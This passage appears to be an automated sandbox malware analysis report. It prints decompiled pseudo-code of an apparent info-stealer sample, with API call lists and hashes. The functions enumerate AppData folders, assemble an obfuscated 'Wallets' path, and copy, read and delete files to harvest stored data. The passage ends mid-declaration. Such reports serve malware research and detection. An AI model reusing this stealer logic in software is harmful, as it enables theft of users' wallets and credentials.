                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$wsprintf$File$Find$_memset$CloseCopyCountDeleteFirstMatchNextPathSpecTick_malloc_rand
                                        • String ID: %s%d$%s\%s$%s\*$\Soft\
                                        • API String ID: 208320889-1080583690
                                        • Opcode ID: 8aa62d7419f85f2ef00388ba70dab843872a4596bbd3c79a27633fe32355b395
                                        • Instruction ID: cde010c1c8b784959c69c70cba0b9be55cea87d0679fcb4305c4a41c014e1b70
                                        • Opcode Fuzzy Hash: 8aa62d7419f85f2ef00388ba70dab843872a4596bbd3c79a27633fe32355b395
                                        • Instruction Fuzzy Hash: CF7182B2901218ABD715EFA4DC84FEAB378BF48700F04859DF509A3141EB74AA85DFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 70%
                                        			E29D964B0(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v804;
                                        				char _v1068;
                                        				void* _v2068;
                                        				struct _WIN32_FIND_DATAA _v2388;
                                        				intOrPtr _v2392;
                                        				intOrPtr _v2396;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t53;
                                        				void* _t97;
                                        				intOrPtr* _t126;
                                        				CHAR* _t127;
                                        				signed int _t128;
                                        				void* _t129;
                                        				void* _t131;
                                        
                                        				_t53 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t53 ^ _t128;
                                        				_t127 = _a4;
                                        				_t126 = _a16;
                                        				_v2396 = _a8;
                                        				_v2392 = _a12;
                                        				E29DB5640( &_v2068, 0, 0x3e8);
                                        				_t13 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2068) < 0x00000000) - 1; // -1
                                        				wsprintfA( &_v804, "%s\\%s\\*", _t13 &  &_v2068, _t127);
                                        				_t131 = _t129 + 0x1c;
                                        				_t117 =  &_v804;
                                        				_t97 = FindFirstFileA( &_v804,  &_v2388);
                                        				if(_t97 == 0xffffffff) {
                                        					L12:
                                        					return E29DADF46(_t63, _t97, _v8 ^ _t128, _t117, _t126, _t127);
                                        				} else {
                                        					goto L1;
                                        				}
                                        				do {
                                        					L1:
                                        					_push(".");
                                        					_push( &(_v2388.cFileName));
                                        					if( *0x29dd8550() != 0) {
                                        						_push("..");
                                        						_push( &(_v2388.cFileName));
                                        						if( *0x29dd8550() != 0) {
                                        							wsprintfA( &_v540, "%s\\%s", _t127,  &(_v2388.cFileName));
                                        							E29DB5640( &_v2068, 0, 0x3e8);
                                        							_t26 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2068) < 0x00000000) - 1; // -1
                                        							wsprintfA( &_v1068, "%s\\%s", _t26 &  &_v2068,  &_v540);
                                        							E29DB5640( &_v276, 0, 0x104);
                                        							_t131 = _t131 + 0x38;
                                        							lstrcatA( &_v276, "\\");
                                        							lstrcatA( &_v276, "W");
                                        							lstrcatA( &_v276, "a");
                                        							lstrcatA( &_v276, "l");
                                        							lstrcatA( &_v276, "l");
                                        							lstrcatA( &_v276, "e");
                                        							lstrcatA( &_v276, "t");
                                        							lstrcatA( &_v276, "s");
                                        							lstrcatA( &_v276, _t127);
                                        							lstrcatA( &_v276, "\\");
                                        							_t117 =  &(_v2388.cFileName);
                                        							lstrcatA( &_v276,  &(_v2388.cFileName));
                                        							if(_t126 != 0) {
                                        								if( *_t126 == 2) {
                                        									_t117 =  &_v1068;
                                        									 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t126 + 4)),  &_v1068,  &_v276, 0, 2);
                                        								} else {
                                        									 *0x29dd8814 = 0x80000;
                                        								}
                                        							} else {
                                        								 *0x29dd8814 = 0x10000;
                                        							}
                                        							if((_v2388.dwFileAttributes & 0x00000010) != 0) {
                                        								_t117 =  &_v540;
                                        								E29D964B0( &_v540, _v2396, _v2392, _t126);
                                        								_t131 = _t131 + 0x10;
                                        							}
                                        						}
                                        					}
                                        				} while (FindNextFileA(_t97,  &_v2388) != 0);
                                        				_t63 = FindClose(_t97);
                                        				goto L12;
                                        			}























                                        APIs
                                        • _memset.LIBCMT ref: 29D964EC
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D96503
                                        • wsprintfA.USER32 ref: 29D96529
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D96540
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9655D
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D96577
                                        • wsprintfA.USER32 ref: 29D96599
                                        • _memset.LIBCMT ref: 29D965AD
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D965C4
                                        • wsprintfA.USER32 ref: 29D965F0
                                        • _memset.LIBCMT ref: 29D96604
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D96618
                                        • lstrcatA.KERNEL32(?,29DCFD20), ref: 29D9662A
                                        • lstrcatA.KERNEL32(?,29DCFD24), ref: 29D9663C
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9664E
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D96660
                                        • lstrcatA.KERNEL32(?,29DCFD2C), ref: 29D96672
                                        • lstrcatA.KERNEL32(?,29DCFD30), ref: 29D96684
                                        • lstrcatA.KERNEL32(?,29DCFD34), ref: 29D96696
                                        • lstrcatA.KERNEL32(?,?), ref: 29D966A4
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D966B6
                                        • lstrcatA.KERNEL32(?,?), ref: 29D966CA
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 29D9673E
                                        • FindClose.KERNEL32(00000000), ref: 29D9674D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find_memsetwsprintf$FileFolderPath$CloseFirstNext
                                        • String ID: %s\%s$%s\%s\*
                                        • API String ID: 2665448725-2081284286
                                        • Opcode ID: b2844eaaa69114fd9784fdccdebf148f088adc9dbc806829c47ec8182936a86f
                                        • Instruction ID: 122b76efaf2514d7c7702bb5cd22f12e8885b49d9e820273c386ab5352398378
                                        • Opcode Fuzzy Hash: b2844eaaa69114fd9784fdccdebf148f088adc9dbc806829c47ec8182936a86f
                                        • Instruction Fuzzy Hash: 9871B773940258ABD716EFA0DC89FE9B37CBF58701F44899CF205D6440EB749A899F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E29D8F3E0(void* __ebx, intOrPtr _a4, intOrPtr _a24) {
                                        				long _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				char _v288;
                                        				char _v552;
                                        				char _v816;
                                        				char _v1080;
                                        				struct _WIN32_FIND_DATAA _v1400;
                                        				void* _v1404;
                                        				void* _v1408;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t38;
                                        				signed int _t39;
                                        				CHAR* _t52;
                                        				void* _t54;
                                        				CHAR* _t58;
                                        				signed int _t63;
                                        				void* _t72;
                                        				intOrPtr* _t81;
                                        				void* _t95;
                                        				void* _t96;
                                        				void* _t97;
                                        				void* _t99;
                                        				void* _t100;
                                        				CHAR* _t101;
                                        				CHAR* _t102;
                                        				signed int _t103;
                                        				void* _t104;
                                        				void* _t106;
                                        				void* _t110;
                                        
                                        				_t72 = __ebx;
                                        				_push(0xffffffff);
                                        				_push(E29DC34D8);
                                        				_push( *[fs:0x0]);
                                        				_t38 =  *0x29dd5664; // 0xd9555f04
                                        				_t39 = _t38 ^ _t103;
                                        				_v24 = _t39;
                                        				_push(_t95);
                                        				_push(_t39);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v8 = 0;
                                        				_v1404 = HeapAlloc(GetProcessHeap(), 0, 0x98967f);
                                        				wsprintfA( &_v816, "%s\\*", __ebx);
                                        				_t106 = _t104 - 0x574 + 0xc;
                                        				_t88 =  &_v816;
                                        				_t99 = FindFirstFileA( &_v816,  &_v1400);
                                        				_v1408 = _t99;
                                        				if(_t99 == 0xffffffff) {
                                        					L12:
                                        					if(_a24 >= 0x10) {
                                        						_push(_a4);
                                        						_t45 = E29DADF3B();
                                        					}
                                        					 *[fs:0x0] = _v16;
                                        					_pop(_t96);
                                        					_pop(_t100);
                                        					return E29DADF46(_t45, _t72, _v24 ^ _t103, _t88, _t96, _t100);
                                        				} else {
                                        					goto L1;
                                        				}
                                        				do {
                                        					L1:
                                        					_push(".");
                                        					_push( &(_v1400.cFileName));
                                        					if( *0x29dd8550() == 0) {
                                        						goto L6;
                                        					}
                                        					_t54 =  *0x29dd8550( &(_v1400.cFileName), "..");
                                        					_t113 = _t54;
                                        					if(_t54 != 0) {
                                        						wsprintfA( &_v1080, "%s\\%s", _t72,  &(_v1400.cFileName));
                                        						E29DB5640( &_v288, 0, 0x104);
                                        						_t58 =  *0x29dd8098; // 0x15a1f98
                                        						lstrcatA( &_v288, _t58);
                                        						_t101 = E29DADFE0( &_v288, _t95, _t99, 0x1a);
                                        						 *_t101 = 0;
                                        						E29DAFCE4(GetTickCount());
                                        						_t110 = _t106 + 0x24;
                                        						_t97 = 0x1a;
                                        						do {
                                        							_t63 = E29DAFCF6(_t113);
                                        							asm("cdq");
                                        							_push(_t63 % 0xa);
                                        							_push(_t101);
                                        							wsprintfA(_t101, "%s%d");
                                        							_t110 = _t110 + 0x10;
                                        							_t97 = _t97 - 1;
                                        						} while (_t97 != 0);
                                        						_t101[0x1a] = 0;
                                        						lstrcatA( &_v288, _t101);
                                        						CopyFileA( &_v1080,  &_v288, 1);
                                        						L29D8EF40( &_v288, _v1404);
                                        						_t106 = _t110 + 4;
                                        						DeleteFileA( &_v288);
                                        						_t99 = _v1408;
                                        					}
                                        					L6:
                                        				} while (FindNextFileA(_t99,  &_v1400) != 0);
                                        				FindClose(_t99);
                                        				_t88 =  &_v552;
                                        				E29DB5640( &_v552, 0, 0x104);
                                        				_t52 =  *0x29dd828c; // 0x15a4228
                                        				_t106 = _t106 + 0xc;
                                        				lstrcatA( &_v552, _t52);
                                        				_t102 = _v1404;
                                        				_t45 = lstrlenA(_t102);
                                        				_t81 =  *0x29dd82ec; // 0x0
                                        				if(_t81 != 0) {
                                        					__eflags =  *_t81 - 2;
                                        					if( *_t81 == 2) {
                                        						_t88 = _t102;
                                        						 *0x29dd8814 = _t45;
                                        					} else {
                                        						 *0x29dd8814 = 0x80000;
                                        					}
                                        				} else {
                                        					 *0x29dd8814 = 0x10000;
                                        				}
                                        				goto L12;
                                        			}

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F,D9555F04), ref: 29D8F41B
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D8F422
                                        • wsprintfA.USER32 ref: 29D8F43B
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D8F452
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D8F475
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D8F48F
                                        • wsprintfA.USER32 ref: 29D8F4B1
                                        • _memset.LIBCMT ref: 29D8F4C5
                                        • lstrcatA.KERNEL32(?,015A1F98), ref: 29D8F4DA
                                        • _malloc.LIBCMT ref: 29D8F4E2
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D8F4EF
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D8F503
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D8F518
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D8F530
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D8F546
                                        • DeleteFileA.KERNEL32(?), ref: 29D8F568
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 29D8F57C
                                        • FindClose.KERNEL32(00000000), ref: 29D8F58B
                                        • _memset.LIBCMT ref: 29D8F59F
                                        • lstrcatA.KERNEL32(?,015A4228), ref: 29D8F5B4
                                        • lstrlenA.KERNEL32(?), ref: 29D8F5C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$FindHeaplstrcatwsprintf$__getptd_memset$AllocAllocateCloseCopyCountDeleteFirstNextProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$%s\%s$%s\*
                                        • API String ID: 1982528250-59778494
                                        • Opcode ID: e8f338bdec66c821874a02e497d3d863e27ac9826f1e34a89c902a7a27a2ae5d
                                        • Instruction ID: 7b6c7bbf36baf75bcf3c26c38a6c484b9b1050a7adaad78cfadaed322864ff39
                                        • Opcode Fuzzy Hash: e8f338bdec66c821874a02e497d3d863e27ac9826f1e34a89c902a7a27a2ae5d
                                        • Instruction Fuzzy Hash: 4851B0B2940254ABD711EFA4DC49FDA7778EF58B01F0081ADE50A93140EB389A46EFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 31%
                                        			E29D9B520(intOrPtr __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, CHAR* _a28, intOrPtr _a32) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v804;
                                        				char _v1068;
                                        				struct _WIN32_FIND_DATAA _v1388;
                                        				intOrPtr _v1392;
                                        				intOrPtr _v1396;
                                        				CHAR* _v1400;
                                        				CHAR* _v1404;
                                        				intOrPtr _v1408;
                                        				intOrPtr* _v1412;
                                        				intOrPtr _v1416;
                                        				void* _v1420;
                                        				intOrPtr _v1424;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t103;
                                        				intOrPtr _t106;
                                        				int _t109;
                                        				intOrPtr _t119;
                                        				intOrPtr _t123;
                                        				signed int _t128;
                                        				signed char _t129;
                                        				signed int _t130;
                                        				intOrPtr _t131;
                                        				signed int _t132;
                                        				intOrPtr _t144;
                                        				intOrPtr* _t159;
                                        				intOrPtr _t170;
                                        				intOrPtr _t172;
                                        				intOrPtr _t173;
                                        				intOrPtr _t174;
                                        				intOrPtr _t206;
                                        				intOrPtr _t211;
                                        				CHAR* _t229;
                                        				intOrPtr _t230;
                                        				signed int _t233;
                                        				void* _t234;
                                        				void* _t235;
                                        				void* _t238;
                                        
                                        				_t103 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t103 ^ _t233;
                                        				_t159 = _a24;
                                        				_t230 = _a16;
                                        				_t229 = _a12;
                                        				_v1404 = _a4;
                                        				_t106 = _a8;
                                        				_v1416 = _t106;
                                        				_v1396 = __ecx;
                                        				_v1408 = _t230;
                                        				_v1392 = _a20;
                                        				_v1412 = _t159;
                                        				_v1400 = _a28;
                                        				wsprintfA( &_v1068, "%s\\*", _t106);
                                        				_t235 = _t234 + 0xc;
                                        				_t199 =  &_v1068;
                                        				_t109 = FindFirstFileA( &_v1068,  &_v1388);
                                        				_v1420 = _t109;
                                        				_v1424 = 0;
                                        				if(_t109 != 0xffffffff) {
                                        					do {
                                        						_push(".");
                                        						_push( &(_v1388.cFileName));
                                        						if( *0x29dd8550() != 0) {
                                        							_push("..");
                                        							_push( &(_v1388.cFileName));
                                        							if( *0x29dd8550() != 0) {
                                        								wsprintfA( &_v276, "%s\\%s", _v1416,  &(_v1388.cFileName));
                                        								E29DB5640( &_v540, 0, 0x104);
                                        								_t119 =  *0x29dd7a8c; // 0x15a1c40
                                        								_t170 =  *0x29dd8110; // 0x15a5048
                                        								wsprintfA( &_v540, "%s\\%s\\%s\\%s", _v1416,  &(_v1388.cFileName), _t170, _t119);
                                        								E29DB5640( &_v804, 0, 0x104);
                                        								_t123 =  *0x29dd7a8c; // 0x15a1c40
                                        								_t172 =  *0x29dd8110; // 0x15a5048
                                        								wsprintfA( &_v804, "%s\\%s\\%s", _v1416, _t172, _t123);
                                        								_t173 =  *0x29dd7d28; // 0x15a1d88
                                        								_t238 = _t235 + 0x54;
                                        								_push(_t173);
                                        								_push( &(_v1388.cFileName));
                                        								if( *0x29dd8550() != 0) {
                                        									_t206 =  *0x29dd7a8c; // 0x15a1c40
                                        									_t128 =  *0x29dd8550( &(_v1388.cFileName), _t206);
                                        									__eflags = _t128;
                                        									if(_t128 != 0) {
                                        										_t129 = GetFileAttributesA( &_v540);
                                        										__eflags = _t129 - 0xffffffff;
                                        										if(_t129 == 0xffffffff) {
                                        											L14:
                                        											_t174 =  *0x29dd7dcc; // 0x15a4f68
                                        											_t130 =  *0x29dd8550( &(_v1388.cFileName), _t174);
                                        											__eflags = _t130;
                                        											if(_t130 != 0) {
                                        												_t131 =  *0x29dd7b24; // 0x15a1e60
                                        												_t132 =  *0x29dd8550( &(_v1388.cFileName), _t131);
                                        												__eflags = _t132;
                                        												if(_t132 != 0) {
                                        													__eflags = _v1388.dwFileAttributes & 0x00000010;
                                        													if((_v1388.dwFileAttributes & 0x00000010) != 0) {
                                        														goto L23;
                                        													}
                                        												} else {
                                        													_t211 = _v1396;
                                        													__eflags =  *((intOrPtr*)(_t211 + 1)) - _t132;
                                        													if( *((intOrPtr*)(_t211 + 1)) == _t132) {
                                        														goto L18;
                                        													} else {
                                        														E29D99F90(_t229, _t230,  &_v276, _v1404, _v1392, _t159);
                                        														E29D9A320( &_v276, _t229, _t159, _v1404);
                                        														goto L17;
                                        													}
                                        												}
                                        											} else {
                                        												_t144 = _v1396;
                                        												__eflags =  *((char*)(_t144 + 2));
                                        												if( *((char*)(_t144 + 2)) != 0) {
                                        													E29D9A570( &_v276, _t229, _t159, _v1404);
                                        													E29D9A7B0(_t229, _v1412, __eflags,  &_v276, _v1404);
                                        													L17:
                                        													_t230 = _v1408;
                                        													_t159 = _v1412;
                                        												}
                                        												L18:
                                        												_push(_a32);
                                        												_push(_v1400);
                                        												_push(_t159);
                                        												_push(_v1392);
                                        												_push(_t230);
                                        												_push(_t229);
                                        												_push( &_v276);
                                        												_push( &(_v1388.cFileName));
                                        												goto L24;
                                        											}
                                        										} else {
                                        											__eflags = _t129 & 0x00000010;
                                        											if((_t129 & 0x00000010) != 0) {
                                        												goto L14;
                                        											} else {
                                        												E29D99A80(_t230, _v1392,  &_v540,  &(_v1388.cFileName), _t229, _t159);
                                        												_push(_a32);
                                        												_push(_v1400);
                                        												_push(_t159);
                                        												_push(_v1392);
                                        												_push(_t230);
                                        												_push(_t229);
                                        												_push( &_v276);
                                        												_push( &(_v1388.cFileName));
                                        												goto L24;
                                        											}
                                        										}
                                        									} else {
                                        										E29D99A80(_t230, _v1392,  &_v276, _v1404, _t229, _t159);
                                        										L23:
                                        										_push(_a32);
                                        										_push(_v1400);
                                        										_push(_t159);
                                        										_push(_v1392);
                                        										_push(_t230);
                                        										_push(_t229);
                                        										_push( &_v276);
                                        										_push( &(_v1388.cFileName));
                                        										L24:
                                        										E29D9B520(_v1396);
                                        									}
                                        								} else {
                                        									E29D99680( &_v276, _t229, _v1400, _v1404, _t230, _v1392);
                                        									_t232 = _a32;
                                        									if(_a32 != 0 && _v1424 == 0) {
                                        										E29D99A80(_v1408, _v1392,  &_v804, 0x29dcd617, _t229, _t159);
                                        										_v1424 = 1;
                                        									}
                                        									E29D9B520(_v1396,  &(_v1388.cFileName),  &_v276, _t229, _v1408, _v1392, _t159, _v1400, _t232);
                                        									_t230 = _v1408;
                                        								}
                                        								E29DB5640( &_v540, 0, 0x104);
                                        								E29DB5640( &_v804, 0, 0x104);
                                        								_t235 = _t238 + 0x18;
                                        							}
                                        						}
                                        						_t199 = _v1420;
                                        					} while (FindNextFileA(_v1420,  &_v1388) != 0);
                                        					_t109 = FindClose(_v1420);
                                        				}
                                        				return E29DADF46(_t109, _t159, _v8 ^ _t233, _t199, _t229, _t230);
                                        			}


                                        APIs
                                        • wsprintfA.USER32 ref: 29D9B582
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9B599
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9B5CC
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9B5E6
                                        • wsprintfA.USER32 ref: 29D9B60E
                                        • _memset.LIBCMT ref: 29D9B622
                                        • wsprintfA.USER32 ref: 29D9B651
                                        • _memset.LIBCMT ref: 29D9B665
                                        • wsprintfA.USER32 ref: 29D9B68D
                                        • StrCmpCA.SHLWAPI(?,015A1D88), ref: 29D9B6A4
                                        • StrCmpCA.SHLWAPI(?,015A1C40), ref: 29D9B757
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9B78A
                                          • Part of subcall function 29D99A80: StrCmpCA.SHLWAPI(?,015A1BD0,D9555F04,?,?,?), ref: 29D99ADA
                                          • Part of subcall function 29D99A80: _memset.LIBCMT ref: 29D99B27
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,015A1F98), ref: 29D99B3D
                                          • Part of subcall function 29D99A80: _malloc.LIBCMT ref: 29D99B45
                                          • Part of subcall function 29D99A80: GetTickCount.KERNEL32 ref: 29D99B52
                                          • Part of subcall function 29D99A80: _rand.LIBCMT ref: 29D99B70
                                          • Part of subcall function 29D99A80: wsprintfA.USER32 ref: 29D99B85
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,00000000), ref: 29D99BA2
                                          • Part of subcall function 29D99A80: CopyFileA.KERNEL32(?,?,00000001), ref: 29D99BB8
                                          • Part of subcall function 29D99A80: _memset.LIBCMT ref: 29D99BCC
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D99BE0
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,015A1A80), ref: 29D99BF4
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D99C06
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,?), ref: 29D99C14
                                        • StrCmpCA.SHLWAPI(?,015A4F68), ref: 29D9B7EC
                                        • StrCmpCA.SHLWAPI(?,015A1E60), ref: 29D9B870
                                          • Part of subcall function 29D9A570: _memset.LIBCMT ref: 29D9A5A8
                                          • Part of subcall function 29D9A570: lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A5BE
                                          • Part of subcall function 29D9A570: _malloc.LIBCMT ref: 29D9A5C6
                                          • Part of subcall function 29D9A570: GetTickCount.KERNEL32 ref: 29D9A5D3
                                          • Part of subcall function 29D9A570: _rand.LIBCMT ref: 29D9A5E7
                                          • Part of subcall function 29D9A570: wsprintfA.USER32 ref: 29D9A5FC
                                          • Part of subcall function 29D9A570: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 29D9A614
                                          • Part of subcall function 29D9A570: CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A624
                                          • Part of subcall function 29D9A570: _memset.LIBCMT ref: 29D9A637
                                          • Part of subcall function 29D9A570: wsprintfA.USER32 ref: 29D9A659
                                          • Part of subcall function 29D9A570: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A6AD
                                          • Part of subcall function 29D9A570: HeapAlloc.KERNEL32(00000000), ref: 29D9A6B4
                                          • Part of subcall function 29D9A7B0: _memset.LIBCMT ref: 29D9A7EC
                                          • Part of subcall function 29D9A7B0: lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A802
                                          • Part of subcall function 29D9A7B0: _malloc.LIBCMT ref: 29D9A80A
                                          • Part of subcall function 29D9A7B0: GetTickCount.KERNEL32 ref: 29D9A817
                                          • Part of subcall function 29D9A7B0: _rand.LIBCMT ref: 29D9A830
                                          • Part of subcall function 29D9A7B0: wsprintfA.USER32 ref: 29D9A845
                                          • Part of subcall function 29D9A7B0: lstrcatA.KERNEL32(?,00000000), ref: 29D9A85D
                                          • Part of subcall function 29D9A7B0: CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A86D
                                          • Part of subcall function 29D9A7B0: _memset.LIBCMT ref: 29D9A880
                                          • Part of subcall function 29D9A7B0: wsprintfA.USER32 ref: 29D9A8A2
                                          • Part of subcall function 29D9A7B0: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A8F6
                                          • Part of subcall function 29D9A7B0: HeapAlloc.KERNEL32(00000000), ref: 29D9A8FD
                                        • _memset.LIBCMT ref: 29D9B904
                                        • _memset.LIBCMT ref: 29D9B91A
                                          • Part of subcall function 29D99680: _memset.LIBCMT ref: 29D996D9
                                          • Part of subcall function 29D99680: lstrcatA.KERNEL32(?,015A1F98,D9555F04,?,?), ref: 29D996EF
                                          • Part of subcall function 29D99680: _malloc.LIBCMT ref: 29D996F7
                                          • Part of subcall function 29D99680: GetTickCount.KERNEL32 ref: 29D99704
                                          • Part of subcall function 29D99680: _rand.LIBCMT ref: 29D99718
                                          • Part of subcall function 29D99680: wsprintfA.USER32 ref: 29D9972D
                                          • Part of subcall function 29D99680: lstrcatA.KERNEL32(?,00000000), ref: 29D99745
                                          • Part of subcall function 29D99680: CopyFileA.KERNEL32(?,?,00000001), ref: 29D9975B
                                        • FindNextFileA.KERNEL32(?,?), ref: 29D9B930
                                        • FindClose.KERNEL32(?), ref: 29D9B945
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$wsprintf$File$CopyCountHeapTick_malloc_rand$Find$AllocProcess$AttributesCloseFirstNext
                                        • String ID: %s\%s$%s\%s\%s$%s\%s\%s\%s$%s\*
                                        • API String ID: 517402847-2940171090
                                        • Opcode ID: b9c803dc790fde59809d9a3f2dde3a1565302c5e1f69b237cb331fd2ddac8371
                                        • Instruction ID: 3de38450a327cc6912729c8c4e7eb1f8be4fb6065a5b58520bb0f894a18da2cc
                                        • Opcode Fuzzy Hash: b9c803dc790fde59809d9a3f2dde3a1565302c5e1f69b237cb331fd2ddac8371
                                        • Instruction Fuzzy Hash: A6C12FB6D10518AFDB14EF54DC84EEBB7B9AB48741F4082CDF909A7240DA34AE85DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E29D958A0(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, CHAR* _a28, char _a32, CHAR* _a40, CHAR* _a56, char _a60, char _a68, intOrPtr _a88) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				char _v288;
                                        				void* _v1288;
                                        				intOrPtr _v1296;
                                        				struct _SECURITY_ATTRIBUTES* _v1300;
                                        				char _v1316;
                                        				intOrPtr _v1324;
                                        				struct _SECURITY_ATTRIBUTES* _v1328;
                                        				char _v1344;
                                        				char _v1352;
                                        				struct _SECURITY_ATTRIBUTES* _v1356;
                                        				CHAR* _v1372;
                                        				char _v1380;
                                        				intOrPtr _v1384;
                                        				char _v1400;
                                        				intOrPtr _v1408;
                                        				char _v1412;
                                        				char _v1428;
                                        				char _v1436;
                                        				CHAR* _v1440;
                                        				char _v1456;
                                        				char _v1464;
                                        				intOrPtr _v1468;
                                        				char _v1484;
                                        				char _v1492;
                                        				char _v1496;
                                        				short _v1512;
                                        				char _v1520;
                                        				intOrPtr _v1524;
                                        				char _v1540;
                                        				char _v1548;
                                        				intOrPtr _v1552;
                                        				char _v1568;
                                        				char _v1576;
                                        				intOrPtr _v1580;
                                        				char _v1596;
                                        				CHAR* _v1600;
                                        				intOrPtr _v1604;
                                        				CHAR* _v1608;
                                        				CHAR* _v1616;
                                        				CHAR* _v1620;
                                        				CHAR* _v1624;
                                        				char _v1632;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t233;
                                        				signed int _t234;
                                        				signed int _t238;
                                        				signed int _t240;
                                        				void* _t244;
                                        				CHAR* _t248;
                                        				void* _t263;
                                        				void* _t265;
                                        				intOrPtr* _t267;
                                        				void* _t270;
                                        				void* _t272;
                                        				void* _t274;
                                        				WCHAR* _t275;
                                        				signed char _t276;
                                        				CHAR* _t291;
                                        				CHAR* _t296;
                                        				void* _t299;
                                        				void* _t301;
                                        				CHAR* _t304;
                                        				void* _t307;
                                        				void* _t309;
                                        				char _t311;
                                        				CHAR* _t314;
                                        				intOrPtr _t329;
                                        				void* _t345;
                                        				signed int _t347;
                                        				CHAR* _t351;
                                        				void* _t352;
                                        				char _t356;
                                        				signed int _t363;
                                        				CHAR* _t368;
                                        				intOrPtr* _t390;
                                        				void* _t402;
                                        				void* _t427;
                                        				CHAR* _t428;
                                        				intOrPtr* _t431;
                                        				void* _t434;
                                        				void* _t437;
                                        				void* _t442;
